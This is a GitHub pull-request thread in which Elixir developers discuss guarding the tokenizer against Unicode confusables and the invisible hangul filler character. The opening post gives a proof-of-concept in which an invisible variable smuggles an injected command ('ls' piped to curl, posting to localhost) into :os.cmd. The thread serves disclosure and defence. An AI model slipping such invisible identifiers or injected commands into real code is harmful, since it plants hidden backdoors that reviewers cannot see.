Guard against confusables incl. hangul space #11410

mrluc · 2021-11-21T06:59:24Z

EDIT: closed because solution that this PR had tested was overly-simplistic; see last 3 comments or so.

I took a pass at protecting against 'confusables', using the subset of Rust's list that are valid as .ex identifiers, and adding one character that Rust's list doesn't catch (hangul space). This would be to complement the recently-added protections against bidirectional characters.

This was just to get the ball rolling -- currently it raises, when maybe it should warn? Other considerations are noted at the end of the PR desc.

I got here kinda by accident; I was talking with someone about that 'hangul space' character enabling a neat supply-chain attack in javascript -- and I confirmed that it works in Elixir too, look for the invisible variable below in 1.13.0-rc.1:

payload = "%3B%20ls%20%7C%20curl%20--data-binary%20%40-%20http%3A%2F%2Flocalhost%3A8000"
external_query = "foo=bar&%E3%85%A4=#{payload}&baz=wow"

values =
  external_query
  |> Plug.Conn.Query.decode
  |> Map.values

[
  baz,
  foo,ㅤ
] = values

looks_safe_enough = [
  "echo",
  "test", ㅤ
]

shell_from_apparently_non_external_inputs =
  looks_safe_enough
  |> Enum.join(" ")
  |> to_charlist

# should see the list of files posted to netcat here:
:os.cmd(shell_from_apparently_non_external_inputs)

Commented proof-of-concept gist showing how it could be exploited in .ex is here. Security-wise it feels okay to discuss in the open; the article I mentioned has done the rounds, 'trojan codes' has raised awareness generally, vendors like github are adding detections/warnings, the bidirectional chars PR was handled in the open, the PoC relies on a contrived scenario, etc.

I saw a comment on the 'bidirectional' PR that pointed at the Rust confusable protections; I processed that, filtered it down from several hundred to only the 48 that are valid identifiers in elixir, and added the hangul character from my PoC (google 'invisible backdoor javascript' for the original article I read on this) which the Rust list didn't include.

Notes:

this approach would add a much larger check than the bidirectional one -- with 48 clauses, which may be excessive
- (though a lot less than the whole list of confusables; out of curiosity I ran the whole list through and 3K of those are valid identifiers in .ex, ie can make a variable with them; however that includes even normal ascii chars since eg. "m" can be confused with "rn").
we may want to whittle down the list -- some are arguably common japanese and hebrew characters -- some of which already appeared in string literals in string_test.exs (the CJK dash, and a Hebrew yod), so I omitted only those 2 from the Rust list.
- the list of clauses was generated with the following gist: https://gist.github.com/mrluc/d3f629d05df125ab88f5038bfc6a3e7b

* seen in article of same name

* hangul space (0x3164) has a PoC; others are the subset of rust's confusables that are currently valid as elixir identifiers, minus the few cjk and hebrew confusables that occurred unescaped in eg. string_test.exs

josevalim · 2021-11-21T10:20:20Z

Thank you @mrluc. This looks a good direction. The place that you changed is related to strings. I assume we still want to allow those in strings, after all hangul space has correct uses in strings, and we want to restrict those only on variables an atoms, correct?

If so, the correct is to handle those files here:

https://github.com/elixir-lang/elixir/blob/main/lib/elixir/unicode/tokenizer.ex

Here would be the steps for adding this:

Include confusables.txt in the list of Unicode files
Change the file above to also parse confusables.txt (code in unicode/unicode.ex can be helpful) and do not allow all characters that are confusable
Update Unicode Syntax doc to declare confusables are not allowed

josevalim · 2021-11-21T10:37:15Z

Upon further inspection, it seems this list is incomplete. For example, aН is a valid variable name, where H is H in Cyrillic. Given how common those characters can be, we need to fully take Rust's approach here:

Get a list of all confusables and their script
If the same token has more than one confusable in different scripts, warn

To be clear then, both H (ascii) and Н (cyrillic) should be in the list of confusables. :)

mrluc · 2021-11-21T15:36:41Z

@josevalim thanks for the pointers 🙏 may need to split addressing this PoC out from the concept of confusables (or add it as an exception/additional filter on top of more comprehensive confusables-handling PR, since Rust-style confusable handling may not catch it...)

Re: the proof-of-concept -- it seems like "a bug in unicode" and also "a bug in unicode's confusables.txt" -- because it visually looks like it should be categorized as whitespace, and as confusable with space, and it's not. For that, adding just a guard against \u3164 (in the fashion I saw done in the bidirectional chars PR) seemed to work. Based on this article.

Re: looking at what Rust's done:

we need to fully take Rust's approach here:

Get a list of all confusables and their script

If the same token has more than one confusable in different scripts, warn

I took a closer look at what Rust's done and I see that the file I had looked at was a bit of a red herring); I have a better idea now of what's involved -- accumulate a lookup of homoglyph 'skeletons' and warn on collisions.

This looks like the relevant Rust tracking issue -- a place where they discuss/link to the work of computing the 'skeleton' lookup for homoglyphs.

And this is the PR where rust's unicode-security crate -- which uses python to iterate over confusables.txt and emit .rs code -- was amended with these protections

I like the distinction in your description -- the lookup is for tokens, not just for valid elixir identifiers, so assuming space is a token, then if \u3164 and 'space' have a collision it would catch it! But ... 'space' isn't one of the confusables for u3164 listed in confusables.txt, which again seems like a 'bug in confusables.txt' since they're visually identical by virtue of being pure whitespace).

mrluc · 2021-11-21T15:50:21Z

Ah, cool, Rust warns of 'uncommon codepoints' by default (playground)

So whatever they do is probably 👍 .

If someone wants to grab earlier feel free, otherwise I can probably put some scheduled "shop time" for this next Thurs/Fri.

Edit: 'what rust does' seems to be 2-layered which seems cool

lookups based on confusables.txt will catch lots of stuff
'uncommon codepoints' will probably catch all kinds of things (like this) which could otherwise sneak through the first, because confusables.txt can have holes/bugs/not be exhaustive, but probably have good coverage on highest-traffic chars

Anyway I'd probably want to look at the impl. for both of those.

josevalim · 2021-11-21T17:19:16Z

Yes, the uncommon is a separate part which we should discuss separately (and confusables are more important IMO).

mrluc added 2 commits November 19, 2021 15:50

poc patch for 'invisible backdoor' char

d68baf8

* seen in article of same name

guard against confusables, hangul space character

ae32d0d

* hangul space (0x3164) has a PoC; others are the subset of rust's confusables that are currently valid as elixir identifiers, minus the few cjk and hebrew confusables that occurred unescaped in eg. string_test.exs

mrluc closed this Nov 21, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Guard against confusables incl. hangul space #11410

Guard against confusables incl. hangul space #11410

Uh oh!

mrluc commented Nov 21, 2021 •

edited

Loading

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

mrluc commented Nov 21, 2021

Uh oh!

mrluc commented Nov 21, 2021 •

edited

Loading

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

Uh oh!

Guard against confusables incl. hangul space #11410

Guard against confusables incl. hangul space #11410

Uh oh!

Conversation

mrluc commented Nov 21, 2021 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

mrluc commented Nov 21, 2021

Uh oh!

mrluc commented Nov 21, 2021 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

josevalim commented Nov 21, 2021

Uh oh!

Uh oh!

mrluc commented Nov 21, 2021 •

edited

Loading

mrluc commented Nov 21, 2021 •

edited

Loading